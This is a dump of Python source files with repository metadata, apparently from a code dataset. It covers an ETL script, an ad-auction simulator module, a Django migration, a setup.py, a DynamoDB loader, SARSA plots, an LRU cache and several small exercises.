config[type]['start_date'],
config[type]['end_date'],
)
# Create source.
source = etl.Source(SOURCE_FILE, SOURCE_URL, SOURCE_DIR)
# Extract trip records.
extract_files('yellow') # Yellow Taxi
extract_files('green') # Green Taxi
extract_files('fhv') # For-Hire Vehicle
extract_files('fhvhv') # High Volume For-Hire Vehicle
# -- Data Processing: Transform -- #
# -- Data Processing: Load -- #
# -- Utilities -- #
def percent(num, denom):
return 100 * num / denom
def preview(df: pd.DataFrame, func_name: str):
print(f'INSIDE {func_name}(): type =', type(df).__name__)
print(df.head(5))
def zScore(x, mean, std):
return (x - mean) / std
# -- Main Program -- #
def main():
"""
Runs the main set of functions that define the program.
"""
# Confirm debugging state.
DEBUG and print('DEBUG =', DEBUG)
# Confirm Python path.
DEBUG and print('sys.path =', sys.path)
# Print constants.
DEBUG and print('PREFIX =', PREFIX)
# Print CLI option values.
DEBUG and print('args.config =', args.config) # Ex: etc/settings/etl.cfg
# Read a configuration file.
cfg = YAMLFile(args.config).load()
DEBUG and print('cfg =', cfg)
DEBUG and print('type(cfg) =', type(cfg))
# Create a mini configuration dictionary.
sources_cfg = cfg['sources']
extract_data(sources_cfg)
# df = extract_data()
# df = transform_data(df)
# visualize_data(df)
# =========================================================================== #
# MAIN EXECUTION
# =========================================================================== #
# -- CLI option processing -- #
args = cli.read_args()
# -- Main Program -- #
# If this module is in the main module, call the main() function.
if __name__ == '__main__':
main()
# -- Housekeeping -- #
# Exit the program normally (i.e., with a POSIX exit code of 0).
sys.exit(0)
| 0
| 0
| 0
| 0
| 0
| 871
| 0
| -13
| 160
|
dcfb93be50b868f85e2e53dee2d5dd941c95ec50
| 4,100
|
py
|
Python
|
ssa_sim_v2/simulator/modules/auction_attributes/auction_attributes_base_module.py
|
donghun2018/adclick-simulator-v2
|
ade886e9dcbde9fcea218a19f0130cc09f81e55e
|
[
"MIT"
] | null | null | null |
ssa_sim_v2/simulator/modules/auction_attributes/auction_attributes_base_module.py
|
donghun2018/adclick-simulator-v2
|
ade886e9dcbde9fcea218a19f0130cc09f81e55e
|
[
"MIT"
] | null | null | null |
ssa_sim_v2/simulator/modules/auction_attributes/auction_attributes_base_module.py
|
donghun2018/adclick-simulator-v2
|
ade886e9dcbde9fcea218a19f0130cc09f81e55e
|
[
"MIT"
] | null | null | null |
# Fix paths for imports to work in unit tests ----------------
if __name__ == "__main__":
from _fix_paths import fix_paths
fix_paths()
# ------------------------------------------------------------
# Load libraries ---------------------------------------------
# ------------------------------------------------------------
if __name__ == "__main__":
import unittest
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestAuctionsAttributes))
unittest.TextTestRunner().run(suite)
| 33.606557
| 152
| 0.596098
|
# Fix paths for imports to work in unit tests ----------------
if __name__ == "__main__":
from _fix_paths import fix_paths
fix_paths()
# ------------------------------------------------------------
# Load libraries ---------------------------------------------
from typing import Dict
import numpy as np
from collections import namedtuple
from ssa_sim_v2.simulator.modules.simulator_module import SimulatorModule
# ------------------------------------------------------------
class AuctionAttributesModule(SimulatorModule):
"""
Base class for all click probability modules with segments.
:ivar np.random.RandomState rng: Random number generator.
:ivar dict prior: Dict with constant probabilities for every segment.
"""
Params = namedtuple('Params', ['p'])
"""
:param float p: Probability of selecting a user from a segment.
"""
def __init__(self, prior={(0,): Params(p=5)}, seed=9):
"""
:param dict prior: Dict with constant probabilities for every segment.
:param int seed: Seed for the random number generator.
"""
super().__init__(prior, seed)
self.prior = dict()
# Normalize prior and store in self.priors
total_p_values = 0
for key in prior.keys():
total_p_values += prior[key].p
for key in prior.keys():
self.prior[key] = AuctionAttributesModule.Params(p=prior[key].p / total_p_values)
self.rng = np.random.RandomState(seed)
def get_auction_attributes(self, n):
"""
Method that returns a dict of number of times each segment has been selected.
:param int n: Number of auctions for which to sample attributes.
:return: Dict of number of times each segment was present in n auctions.
:rtype: Dict[tuple, int]
"""
# This is used since np does not want to accept tuple as an item and throws error that 'a must be 1-dimensional'
# dict keys (tuples) are converted to strings, then random choice is made using strings versions of keys, then
# results are passed to a final dict where keys are of their original form
keys_dict = dict()
for key in self.prior.keys():
keys_dict[str(key)] = key
keys = list(self.prior)
keys = [str(key) for key in keys]
probabilities = [self.prior[keys_dict[key]].p for key in keys]
choices = self.rng.choice(a=keys, p=probabilities, size=n)
unique, counts = np.unique(choices, return_counts=True)
choices_dict_str = dict(zip(unique, counts))
for key in keys:
if key in choices_dict_str.keys():
pass
else:
choices_dict_str[key] = 0
choices_dict = dict()
for key in self.prior.keys():
choices_dict[key] = choices_dict_str[str(key)]
return choices_dict
if __name__ == "__main__":
import unittest
class TestAuctionsAttributes(unittest.TestCase):
def test_sanity(self):
Params = AuctionAttributesModule.Params
attributes_model = AuctionAttributesModule(
prior={
(0, 0): Params(p=45),
(0, 1): Params(p=25),
(1, 0): Params(p=235),
(1, 1): Params(p=76)},
seed=1234
)
number_of_auctions = [100, 1000, 10000, 15000, 50000, 150000, 300000, 500000]
for num in number_of_auctions:
choices_dict = attributes_model.get_auction_attributes(n=num)
#print(f'Throughout {num} auctions that were run, following segments were selected following number of times: {choices_dict}')
print ('Throughout {} auctions that were run, following segments were selected following number of times: {}').format(num, choices_dict)
self.assertTrue(True)
print("")
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestAuctionsAttributes))
unittest.TextTestRunner().run(suite)
| 0
| 0
| 0
| 3,367
| 0
| 0
| 0
| 64
| 142
|
348061fbd3722432b2a2937544c82aef93786355
| 232
|
py
|
Python
|
src/cloudio/exception/invalid_cloudio_attribute_type_exception.py
|
michaelFavre/cloudio-endpoint-python
|
c00f7cc0578d1974d47fbab5a97a3239fcb99084
|
[
"MIT"
] | null | null | null |
src/cloudio/exception/invalid_cloudio_attribute_type_exception.py
|
michaelFavre/cloudio-endpoint-python
|
c00f7cc0578d1974d47fbab5a97a3239fcb99084
|
[
"MIT"
] | null | null | null |
src/cloudio/exception/invalid_cloudio_attribute_type_exception.py
|
michaelFavre/cloudio-endpoint-python
|
c00f7cc0578d1974d47fbab5a97a3239fcb99084
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
| 46.4
| 122
| 0.732759
|
# -*- coding: utf-8 -*-
class InvalidCloudioAttributeTypeException(Exception):
def __init__(self, type):
super(InvalidCloudioAttributeTypeException, self).__init__(str(type) + ' is not a valid cloud.io attribute type!')
| 0
| 0
| 0
| 186
| 0
| 0
| 0
| 0
| 23
|
b11059298c8234b3e10476c7c2a4e80a7072ec74
| 1,085
|
py
|
Python
|
src/account/migrations/0002_auto_20200412_1356.py
|
kravchenko89/test
|
9eb43e6e96ec198fa433c775f1ffa0f02022e6e4
|
[
"MIT"
] | null | null | null |
src/account/migrations/0002_auto_20200412_1356.py
|
kravchenko89/test
|
9eb43e6e96ec198fa433c775f1ffa0f02022e6e4
|
[
"MIT"
] | 6
|
2021-03-19T10:08:06.000Z
|
2022-02-10T14:03:57.000Z
|
src/account/migrations/0002_auto_20200412_1356.py
|
kravchenko89/test
|
9eb43e6e96ec198fa433c775f1ffa0f02022e6e4
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2.10 on 2020-04-12 13:56
| 30.138889
| 191
| 0.582488
|
# Generated by Django 2.2.10 on 2020-04-12 13:56
import django.core.validators
from django.db import migrations, models
import django_countries.fields
class Migration(migrations.Migration):
dependencies = [
('account', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='user',
name='bio',
field=models.TextField(blank=True, max_length=500),
),
migrations.AddField(
model_name='user',
name='birth_date',
field=models.DateField(blank=True, null=True),
),
migrations.AddField(
model_name='user',
name='country',
field=django_countries.fields.CountryField(blank=True, max_length=2, null=True),
),
migrations.AddField(
model_name='user',
name='phone',
field=models.CharField(blank=True, max_length=17, null=True, validators=[django.core.validators.RegexValidator(message='it should be: +************', regex='^\\+?1?\\d{9,15}$')]),
),
]
| 0
| 0
| 0
| 909
| 0
| 0
| 0
| 36
| 90
|
d34c7fe1bde2e41f49f5f3ca9ebb728a7f0a3605
| 1,570
|
py
|
Python
|
model_lstm/setup.py
|
ofbennett/sentiment-analysis-app
|
94362ae3e638daeec29e09065549fd4078af8a1a
|
[
"MIT"
] | 2
|
2020-10-04T16:58:54.000Z
|
2021-10-04T13:51:10.000Z
|
model_lstm/setup.py
|
ofbennett/sentiment-analysis-app
|
94362ae3e638daeec29e09065549fd4078af8a1a
|
[
"MIT"
] | null | null | null |
model_lstm/setup.py
|
ofbennett/sentiment-analysis-app
|
94362ae3e638daeec29e09065549fd4078af8a1a
|
[
"MIT"
] | null | null | null |
from setuptools import find_packages, setup
from pathlib import Path
NAME = 'model_lstm'
DESCRIPTION = 'LSTM model which classifies the sentiment of English sentences.'
URL = 'https://github.com/ofbennett/sentiment-analysis-app'
EMAIL = '[email protected]'
AUTHOR = 'Oscar Bennett'
REQUIRES_PYTHON = '>=3.7.0'
ROOT_DIR = Path(__file__).resolve().parent
PACKAGE_DIR = ROOT_DIR / 'model_lstm'
LONG_DESCRIPTION = (PACKAGE_DIR / 'README.md').read_text(encoding='utf-8')
with open(PACKAGE_DIR / 'VERSION') as f:
VERSION = f.read().strip()
setup(
name=NAME,
version=VERSION,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
long_description_content_type='text/markdown',
author=AUTHOR,
author_email=EMAIL,
python_requires=REQUIRES_PYTHON,
url=URL,
packages=find_packages(exclude=('tests',)),
package_data={'model_lstm': ['VERSION',
'README.md',
f'trained_models/lstm_model_v{VERSION}.h5',
f'trained_models/lstm_pipeline_v{VERSION}.pkl']},
install_requires=list_reqs(),
extras_require={},
license='MIT',
classifiers=[
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
],
)
| 34.130435
| 82
| 0.652229
|
from setuptools import find_packages, setup
from pathlib import Path
NAME = 'model_lstm'
DESCRIPTION = 'LSTM model which classifies the sentiment of English sentences.'
URL = 'https://github.com/ofbennett/sentiment-analysis-app'
EMAIL = '[email protected]'
AUTHOR = 'Oscar Bennett'
REQUIRES_PYTHON = '>=3.7.0'
ROOT_DIR = Path(__file__).resolve().parent
PACKAGE_DIR = ROOT_DIR / 'model_lstm'
LONG_DESCRIPTION = (PACKAGE_DIR / 'README.md').read_text(encoding='utf-8')
with open(PACKAGE_DIR / 'VERSION') as f:
VERSION = f.read().strip()
def list_reqs(fname='requirements.txt'):
with open(fname) as fd:
return fd.read().splitlines()
setup(
name=NAME,
version=VERSION,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
long_description_content_type='text/markdown',
author=AUTHOR,
author_email=EMAIL,
python_requires=REQUIRES_PYTHON,
url=URL,
packages=find_packages(exclude=('tests',)),
package_data={'model_lstm': ['VERSION',
'README.md',
f'trained_models/lstm_model_v{VERSION}.h5',
f'trained_models/lstm_pipeline_v{VERSION}.pkl']},
install_requires=list_reqs(),
extras_require={},
license='MIT',
classifiers=[
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
],
)
| 0
| 0
| 0
| 0
| 0
| 85
| 0
| 0
| 23
|
d720558039425b7b46dedfcf73d7c8783c9496cd
| 579
|
py
|
Python
|
Python/Fundamentals/io_switch.py
|
Gjacquenot/training-material
|
16b29962bf5683f97a1072d961dd9f31e7468b8d
|
[
"CC-BY-4.0"
] | 115
|
2015-03-23T13:34:42.000Z
|
2022-03-21T00:27:21.000Z
|
Python/Fundamentals/io_switch.py
|
Gjacquenot/training-material
|
16b29962bf5683f97a1072d961dd9f31e7468b8d
|
[
"CC-BY-4.0"
] | 56
|
2015-02-25T15:04:26.000Z
|
2022-01-03T07:42:48.000Z
|
Python/Fundamentals/io_switch.py
|
Gjacquenot/training-material
|
16b29962bf5683f97a1072d961dd9f31e7468b8d
|
[
"CC-BY-4.0"
] | 59
|
2015-11-26T11:44:51.000Z
|
2022-03-21T00:27:22.000Z
|
#!/usr/bin/env python
if __name__ == '__main__':
from argparse import ArgumentParser
from io import StringIO
import sys
arg_parser = ArgumentParser(description='I/O test')
arg_parser.add_argument('-o', dest='output', help='output file')
options = arg_parser.parse_args()
str_io = StringIO()
for line in ['abc', 'def', 'ghi']:
str_io.write(line + '\n')
if options.output:
output = open(options.output, 'w')
else:
output = sys.stdout
output.write(str_io.getvalue())
if options.output:
output.close()
| 28.95
| 68
| 0.632124
|
#!/usr/bin/env python
if __name__ == '__main__':
from argparse import ArgumentParser
from io import StringIO
import sys
arg_parser = ArgumentParser(description='I/O test')
arg_parser.add_argument('-o', dest='output', help='output file')
options = arg_parser.parse_args()
str_io = StringIO()
for line in ['abc', 'def', 'ghi']:
str_io.write(line + '\n')
if options.output:
output = open(options.output, 'w')
else:
output = sys.stdout
output.write(str_io.getvalue())
if options.output:
output.close()
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
9df7df112f519136b1e342846112fa1c98437980
| 4,102
|
py
|
Python
|
app.py
|
banana-breads/SmartOven
|
d5a79a77ceca6269252d27b350d6d6ccd76f3000
|
[
"MIT"
] | 3
|
2022-01-30T18:00:26.000Z
|
2022-01-30T18:03:34.000Z
|
app.py
|
banana-breads/SmartOven
|
d5a79a77ceca6269252d27b350d6d6ccd76f3000
|
[
"MIT"
] | 10
|
2022-01-30T21:06:40.000Z
|
2022-02-03T09:42:36.000Z
|
app.py
|
banana-breads/SmartOven
|
d5a79a77ceca6269252d27b350d6d6ccd76f3000
|
[
"MIT"
] | 1
|
2022-02-01T12:48:05.000Z
|
2022-02-01T12:48:05.000Z
|
import argparse
swagger = None
# TODO have blueprints in a spepparate module
# Arguments
parser = argparse.ArgumentParser(description="SmartOven Flask server")
parser.add_argument('-t', '--test',
help='Run the server in testing mode',
action="store_true"
)
if __name__ == "__main__":
args = parser.parse_args()
create_app(testing=args.test)
app.run(debug=False)
| 29.941606
| 75
| 0.627986
|
import json
from flask import Flask
from flasgger import Swagger
from globals import connected_devices, Oven
import os
import recipes
import ovens
import recipe_search_online
import db
from mqtt_shared import mqtt_manager, mqtt_topics
from constants import MONGO_URI, MONGO_URI_TEST
import argparse
from spec import SWAGGER_TEMPLATE, dump_apispecs_to_json
from flask_pymongo import PyMongo
swagger = None
# TODO have blueprints in a spepparate module
# Arguments
parser = argparse.ArgumentParser(description="SmartOven Flask server")
parser.add_argument('-t', '--test',
help='Run the server in testing mode',
action="store_true"
)
def create_app(test_config=None, testing=None):
global app, swagger
app = Flask(__name__, instance_relative_config=True)
if not testing:
app.config.from_mapping(
SECRET_KEY='dev',
MONGO_URI=MONGO_URI,
)
else:
app.config.from_mapping(
SECRET_KEY='test',
MONGO_URI=MONGO_URI_TEST,
)
# Setting up Swagger API
app.config['SWAGGER'] = {
'uiversion': 3,
'openapi': '3.0.2'
}
swagger = Swagger(app, template=SWAGGER_TEMPLATE)
if test_config is None:
# load the instance config, if it exists, when not testing
app.config.from_pyfile('config.py', silent=True)
else:
# load the test config if passed in
app.config.from_mapping(test_config)
# Ensure the instance folder exists
try:
os.makedirs(app.instance_path)
except OSError:
pass
db.init_app(app)
# App blueprints
app.register_blueprint(recipes.bp)
app.register_blueprint(ovens.bp)
app.register_blueprint(recipe_search_online.bp)
# Save OpenAPI specs
# with app.app_context():
# dump_apispecs_to_json(swagger)
mqtt_manager.start("server", 1, [
(mqtt_topics.CONNECT, _handle_device_connect),
(mqtt_topics.DISCONNECT, _handle_device_disconnect)
])
return app
def _handle_device_connect(client, userdata, msg):
client_id = client._client_id.decode()
device_id = msg.payload.decode()
if client_id == device_id:
return
if device_id not in connected_devices:
connected_devices[device_id] = Oven(device_id)
print(f'Device connected {device_id}')
'''
new device connected
subscribe and handle messages sent
to it's corresponding topic
'''
def _handle_device_info(client, userdata, msg):
topic = msg.topic
payload = msg.payload.decode()
data = json.loads(payload)
info_type = topic.split('/')[-1]
print(data)
if device_id not in connected_devices:
# TODO logging
print(f'Device {device_id} not connected')
return
device = connected_devices[device_id]
if info_type == 'temperature':
device.temperature = data
elif info_type == 'recipe_details':
device.recipe_info = data
elif info_type == 'time':
device.time = data
elif info_type == 'state':
device.state = data
elif info_type == 'recipe_done':
# can be replace with notifications in production
print(data.get('message', "Recipe done"))
topic = mqtt_topics.INFO_PREFIX.format(device_id=device_id) + "/#"
mqtt_manager.register_callback(topic, _handle_device_info)
def _handle_device_disconnect(client, userdata, msg):
device_id = msg.payload.decode()
connected_devices.pop(device_id, None)
print(f'Device disconnected {device_id}')
topic = mqtt_topics.INFO_PREFIX.format(device_id=device_id) + "/#"
mqtt_manager.unsubscribe(topic)
if __name__ == "__main__":
args = parser.parse_args()
create_app(testing=args.test)
app.run(debug=False)
| 0
| 0
| 0
| 0
| 0
| 3,227
| 0
| 88
| 380
|
cfebce4ce5effba03e6fe213972dd94622cfecd1
| 511
|
py
|
Python
|
msg_90s_celular_20_02_2019/converte_num_letra.py
|
python-joinville/dojo-puzzles
|
412d8d3443b2cdb492fa9a77c08a876a182994ee
|
[
"MIT"
] | 3
|
2018-07-31T19:49:43.000Z
|
2019-06-28T20:52:58.000Z
|
msg_90s_celular_20_02_2019/converte_num_letra.py
|
python-joinville/dojo-puzzles
|
412d8d3443b2cdb492fa9a77c08a876a182994ee
|
[
"MIT"
] | null | null | null |
msg_90s_celular_20_02_2019/converte_num_letra.py
|
python-joinville/dojo-puzzles
|
412d8d3443b2cdb492fa9a77c08a876a182994ee
|
[
"MIT"
] | 1
|
2018-07-28T19:36:48.000Z
|
2018-07-28T19:36:48.000Z
|
tabela = {'2': 'a',
'3':'d',
'5':'j',
'4':'g',
'6':'m',
'7':'p',
'8':'t',
'9': 'w',
'0': ' ',
}
| 22.217391
| 47
| 0.403131
|
tabela = {'2': 'a',
'3':'d',
'5':'j',
'4':'g',
'6':'m',
'7':'p',
'8':'t',
'9': 'w',
'0': ' ',
}
def converte_num_letra(digitos):
palavra = ''
letra = ''
sequencia = ''
for digito in digitos:
if letra != '' and digito != letra:
palavra = palavra + tabela[digito]
elif digito == letra:
sequencia += digito
palavra = palavra + tabela[digito]
return palavra
| 0
| 0
| 0
| 0
| 0
| 311
| 0
| 0
| 23
|
494aaca2f4ace6c6bc7d69520a23e5deddd3db65
| 720
|
py
|
Python
|
src/Chapter 3/Exercise 7.py
|
group9BSE1/BSE-2021
|
bea904fce079b856c26f8c06bd734176bdc4d70d
|
[
"MIT"
] | 1
|
2021-03-27T19:01:49.000Z
|
2021-03-27T19:01:49.000Z
|
src/Chapter 3/Exercise 7.py
|
group9BSE1/BSE-2021
|
bea904fce079b856c26f8c06bd734176bdc4d70d
|
[
"MIT"
] | null | null | null |
src/Chapter 3/Exercise 7.py
|
group9BSE1/BSE-2021
|
bea904fce079b856c26f8c06bd734176bdc4d70d
|
[
"MIT"
] | null | null | null |
# location
location = input("Job Location:\n")
pay = input("Payment:\n")
# Prints For decisions
no = "No thanks,I can find something Better"
doubt = "Without a doubt I'll take it"
sure = "Sure, I can work with that"
no_way = "No way!"
# Try and Except
try:
location = str(location)
pay = float(pay)
except:
print("Error, Invalid input")
# After Except
if location == "Mbarara":
if pay == 4000000:
print(no)
else:
if pay > 4000000:
print(sure)
elif location == "Kampala":
if pay == 10000000:
print(no_way)
else:
if pay >= 10000000:
print(sure)
elif location == "space":
print(doubt)
else:
if pay >= 6000000:
print(sure)
| 21.176471
| 44
| 0.594444
|
# location
location = input("Job Location:\n")
pay = input("Payment:\n")
# Prints For decisions
no = "No thanks,I can find something Better"
doubt = "Without a doubt I'll take it"
sure = "Sure, I can work with that"
no_way = "No way!"
# Try and Except
try:
location = str(location)
pay = float(pay)
except:
print("Error, Invalid input")
# After Except
if location == "Mbarara":
if pay == 4000000:
print(no)
else:
if pay > 4000000:
print(sure)
elif location == "Kampala":
if pay == 10000000:
print(no_way)
else:
if pay >= 10000000:
print(sure)
elif location == "space":
print(doubt)
else:
if pay >= 6000000:
print(sure)
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
c64480096569db772606bfc626022fbec11fab93
| 1,753
|
py
|
Python
|
broker-manager/SearchDate.py
|
victor-prado/broker-manager
|
b056cf59247e41e890b1443c0c9e44832b79c51a
|
[
"MIT"
] | null | null | null |
broker-manager/SearchDate.py
|
victor-prado/broker-manager
|
b056cf59247e41e890b1443c0c9e44832b79c51a
|
[
"MIT"
] | null | null | null |
broker-manager/SearchDate.py
|
victor-prado/broker-manager
|
b056cf59247e41e890b1443c0c9e44832b79c51a
|
[
"MIT"
] | null | null | null |
#Arrumar!
#root = tk.Tk()
#app = SearchDate(master=root)
#app.mainloop()
#data = Data()
#data.db.close()
| 28.274194
| 77
| 0.541928
|
import tkinter as tk
from Data import Data
from EditClient import EditClient
class SearchDate(tk.Frame, Data):
def __init__(self, master=None):
super().__init__(master)
self.frame = tk.Frame(self.master)
self.frame.grid()
self.create_table()
def create_entry(self, row_value, message):
L = tk.Label(self.master, text=message)
L.grid(row=row_value, column=0)
E = tk.Entry(self.master, bd=5)
E.grid(row=row_value, column=1)
return E
def create_table(self):
global E1
E1 = self.create_entry(0, "Data")
B1 = tk.Button(self.master, text="Buscar",
command=self.search_date)
B1.grid(row=0, column=2)
def search_date(self):
parameter = E1.get()
ids = self.contractByDate(parameter)
#print(ids)
self.frame.destroy()
self.frame = tk.Frame(self.master)
self.frame.grid()
i=0
for line in ids:
self.get_contract(line)
self.get_client(self.contract["id_client"])
try:
result = self.client["name"]
except:
result = "(Sem nome)"
button = tk.Button(self.frame, text=result,
command= lambda id_client = self.client["id"]:
self.open_client(id_client))
button.grid()
i=i+1
def open_client(self, id_client):
top = tk.Tk()
client = EditClient(master=top, id_client=id_client)
client.addButtons()
#Arrumar!
#root = tk.Tk()
#app = SearchDate(master=root)
#app.mainloop()
#data = Data()
#data.db.close()
| 0
| 0
| 0
| 1,546
| 0
| 0
| 0
| 11
| 89
|
2d82e8a5afd34b19a82dd079954acdf19ab0b1a0
| 467
|
py
|
Python
|
lego-catalog/backend/resources/scripts/populate_dynamodb.py
|
neovasili/101_serverless_workshop
|
a005ab4af620c3c1a522aab8d201378ea7840ab5
|
[
"MIT"
] | 4
|
2019-11-13T17:58:15.000Z
|
2020-03-12T12:24:10.000Z
|
lego-catalog/backend/resources/scripts/populate_dynamodb.py
|
neovasili/101_serverless_workshop
|
a005ab4af620c3c1a522aab8d201378ea7840ab5
|
[
"MIT"
] | null | null | null |
lego-catalog/backend/resources/scripts/populate_dynamodb.py
|
neovasili/101_serverless_workshop
|
a005ab4af620c3c1a522aab8d201378ea7840ab5
|
[
"MIT"
] | null | null | null |
import boto3
import json
session = boto3.session.Session( profile_name= 'jmcore' )
dynamodb = session.resource( 'dynamodb', region_name= 'eu-west-1' )
table = dynamodb.Table( 'serverless_workshop' )
with open( "user-sets-data.json" ) as json_file:
users = json.load( json_file )
for user in users:
userID = user[ 'userID' ]
sets = user[ 'sets' ]
response = table.put_item(
Item = {
'userID': userID,
'sets': sets
}
)
| 24.578947
| 67
| 0.631692
|
import boto3
import json
session = boto3.session.Session( profile_name= 'jmcore' )
dynamodb = session.resource( 'dynamodb', region_name= 'eu-west-1' )
table = dynamodb.Table( 'serverless_workshop' )
with open( "user-sets-data.json" ) as json_file:
users = json.load( json_file )
for user in users:
userID = user[ 'userID' ]
sets = user[ 'sets' ]
response = table.put_item(
Item = {
'userID': userID,
'sets': sets
}
)
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
d9beda75cf8f601813cb1e0106a06881bcd28dbb
| 4,306
|
py
|
Python
|
ml/sarsa/gym-minigrid/tests.py
|
AlinMH/C-Projects
|
1e11b4fd1b96045b4b810d5892b2be73c1d5d886
|
[
"MIT"
] | null | null | null |
ml/sarsa/gym-minigrid/tests.py
|
AlinMH/C-Projects
|
1e11b4fd1b96045b4b810d5892b2be73c1d5d886
|
[
"MIT"
] | null | null | null |
ml/sarsa/gym-minigrid/tests.py
|
AlinMH/C-Projects
|
1e11b4fd1b96045b4b810d5892b2be73c1d5d886
|
[
"MIT"
] | null | null | null |
if __name__ == '__main__':
plot_softmax("MiniGrid-Empty-6x6-v0")
| 46.804348
| 105
| 0.51974
|
from sarsa_skel import *
def plot_egreedy(map):
c1 = 0.5
lr1 = 0.1
d1 = 0.99
q01 = 0
steps1, avg_lengths1, avg_returns1 = sarsa_egreedy(map_file=map, learning_rate=lr1,
discount=d1, const=c1, train_episodes=500, q0=q01,
final_show=False)
c2 = 0.5
lr2 = 0.1
d2 = 0.99
q02 = 0.2
steps2, avg_lengths2, avg_returns2 = sarsa_egreedy(map_file=map, learning_rate=lr2,
discount=d2, const=c2, train_episodes=500, q0=q02,
final_show=False)
c3 = 0.5
lr3 = 0.1
d3 = 0.99
q03 = 0.5
steps3, avg_lengths3, avg_returns3 = sarsa_egreedy(map_file=map, learning_rate=lr3,
discount=d3, const=c3, train_episodes=500, q0=q03,
final_show=False)
c4 = 0.5
lr4 = 0.1
d4 = 0.99
q04 = 1
steps4, avg_lengths4, avg_returns4 = sarsa_egreedy(map_file=map, learning_rate=lr4,
discount=d4, const=c4, train_episodes=500, q0=q04,
final_show=False)
_fig, (ax1, ax2) = plt.subplots(ncols=2)
ax1.plot(steps1, avg_lengths1, label="egreedy c:" + str(c1) + " lr=" + str(lr1) + " q0=" + str(q01))
ax1.plot(steps2, avg_lengths2, label="egreedy c:" + str(c2) + " lr=" + str(lr2) + " q0=" + str(q02))
ax1.plot(steps3, avg_lengths3, label="egreedy c:" + str(c3) + " lr=" + str(lr3) + " q0=" + str(q03))
ax1.plot(steps4, avg_lengths4, label="egreedy c:" + str(c4) + " lr=" + str(lr4) + " q0=" + str(q04))
ax1.set_title("Average episode length")
ax1.legend()
ax2.plot(steps1, avg_returns1, label="egreedy c:" + str(c1) + " lr=" + str(lr1) + " q0=" + str(q01))
ax2.plot(steps2, avg_returns2, label="egreedy c:" + str(c2) + " lr=" + str(lr2) + " q0=" + str(q02))
ax2.plot(steps3, avg_returns3, label="egreedy c:" + str(c3) + " lr=" + str(lr3) + " q0=" + str(q03))
ax2.plot(steps4, avg_returns4, label="egreedy c:" + str(c4) + " lr=" + str(lr4) + " q0=" + str(q04))
ax2.set_title("Average episode return")
ax2.legend()
plt.show()
def plot_softmax(map):
lr1 = 0.1
d1 = 0.99
steps1, avg_lengths1, avg_returns1 = sarsa_softmax(map_file=map, learning_rate=lr1,
discount=d1, train_episodes=500, q0=0,
final_show=False)
lr2 = 0.2
d2 = 0.99
steps2, avg_lengths2, avg_returns2 = sarsa_softmax(map_file=map, learning_rate=lr2,
discount=d2, train_episodes=500, q0=0,
final_show=False)
lr3 = 0.4
d3 = 0.99
steps3, avg_lengths3, avg_returns3 = sarsa_softmax(map_file=map, learning_rate=lr3,
discount=d3, train_episodes=500, q0=0,
final_show=False)
lr4 = 0.8
d4 = 0.99
steps4, avg_lengths4, avg_returns4 = sarsa_softmax(map_file=map, learning_rate=lr4,
discount=d4, train_episodes=500, q0=0,
final_show=False)
_fig, (ax1, ax2) = plt.subplots(ncols=2)
ax1.plot(steps1, avg_lengths1, label="softmax lr=" + str(lr1))
ax1.plot(steps2, avg_lengths2, label="softmax lr=" + str(lr2))
ax1.plot(steps3, avg_lengths3, label="softmax lr=" + str(lr3))
ax1.plot(steps4, avg_lengths4, label="softmax lr=" + str(lr4))
ax1.set_title("Average episode length")
ax1.legend()
ax2.plot(steps1, avg_returns1, label="softmax lr=" + str(lr1))
ax2.plot(steps2, avg_returns2, label="softmax lr=" + str(lr2))
ax2.plot(steps3, avg_returns3, label="softmax lr=" + str(lr3))
ax2.plot(steps4, avg_returns4, label="softmax lr=" + str(lr4))
ax2.set_title("Average episode return")
ax2.legend()
plt.show()
if __name__ == '__main__':
plot_softmax("MiniGrid-Empty-6x6-v0")
| 0
| 0
| 0
| 0
| 0
| 4,162
| 0
| 3
| 68
|
47b9a30e8798f592988d1d728ccd51bd10f6cb58
| 958
|
py
|
Python
|
Python3/146.lru-cache.py
|
610yilingliu/leetcode
|
30d071b3685c2131bd3462ba77c6c05114f3f227
|
[
"MIT"
] | null | null | null |
Python3/146.lru-cache.py
|
610yilingliu/leetcode
|
30d071b3685c2131bd3462ba77c6c05114f3f227
|
[
"MIT"
] | null | null | null |
Python3/146.lru-cache.py
|
610yilingliu/leetcode
|
30d071b3685c2131bd3462ba77c6c05114f3f227
|
[
"MIT"
] | null | null | null |
#
# @lc app=leetcode id=146 lang=python3
#
# [146] LRU Cache
#
# @lc code=start
# Your LRUCache object will be instantiated and called as such:
# obj = LRUCache(capacity)
# param_1 = obj.get(key)
# obj.put(key,value)
# @lc code=end
| 22.809524
| 63
| 0.538622
|
#
# @lc app=leetcode id=146 lang=python3
#
# [146] LRU Cache
#
# @lc code=start
class LRUCache:
def __init__(self, capacity: int):
self.cap = capacity
self.d = dict()
self.stack = []
def get(self, key: int):
if key not in self.d:
return -1
self.stack.remove(key)
self.stack.append(key)
return self.d[key]
def put(self, key: int, value: int):
if key in self.d:
self.d[key] = value
self.stack.remove(key)
self.stack.append(key)
else:
if len(self.stack) >= self.cap:
to_delete = self.stack[0]
self.stack = self.stack[1:]
del self.d[to_delete]
self.d[key] = value
self.stack.append(key)
# Your LRUCache object will be instantiated and called as such:
# obj = LRUCache(capacity)
# param_1 = obj.get(key)
# obj.put(key,value)
# @lc code=end
| 0
| 0
| 0
| 700
| 0
| 0
| 0
| 0
| 22
|
019902fd823def4e117ea65ffc273ad7678112be
| 7,817
|
py
|
Python
|
mergejs.py
|
tmcw/OpenLayerer
|
44212b0f9a8aae71f6f96f6357671e89f6ea6cc5
|
[
"Apache-2.0",
"BSD-2-Clause"
] | 1
|
